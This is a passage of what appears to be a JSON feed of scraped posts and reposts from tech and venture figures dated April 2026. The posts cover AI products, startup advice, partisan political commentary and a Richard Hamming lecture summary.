right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00", + "title_zh": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not." + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00", + "title_zh": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way." + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00", + "title_zh": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00", + "title_zh": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00", + "title_zh": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating." + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00", + "title_zh": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00", + "title_zh": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00", + "title_zh": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00", + "title_zh": "Durer was the original Dr Seuss." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00", + "title_zh": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes." + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00", + "title_zh": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages." + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00", + "title_zh": "RT by @Jason: Random pic of @Jason protecting our $TAO bags" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00", + "title_zh": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00", + "title_zh": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00", + "title_zh": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00", + "title_zh": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record." + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00", + "title_zh": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things." + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00", + "title_zh": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00", + "title_zh": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are." + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00", + "title_zh": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00", + "title_zh": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00", + "title_zh": "how can they write code so fast?!" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00", + "title_zh": "R to @sama: (and we will fix the former)" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00", + "title_zh": "we still get looksmaxxed on frontend a little but we IQmog hard now" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00", + "title_zh": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00", + "title_zh": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00", + "title_zh": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00", + "title_zh": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00", + "title_zh": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered." + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00", + "title_zh": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00", + "title_zh": "RT by @DavidSacks: Incredible return on investment! 💰💰💰" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00", + "title_zh": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00", + "title_zh": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns." + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00", + "title_zh": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different." + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00", + "title_zh": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00", + "title_zh": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful." + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00", + "title_zh": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00", + "title_zh": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world." + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00", + "title_zh": "RT by @satoshibun: Baby’s first con" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00", + "title_zh": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them." + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00", + "title_zh": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00", + "title_zh": "RT by @satoshibun: Good morning! Rise and shine, gamers!" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00", + "title_zh": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection 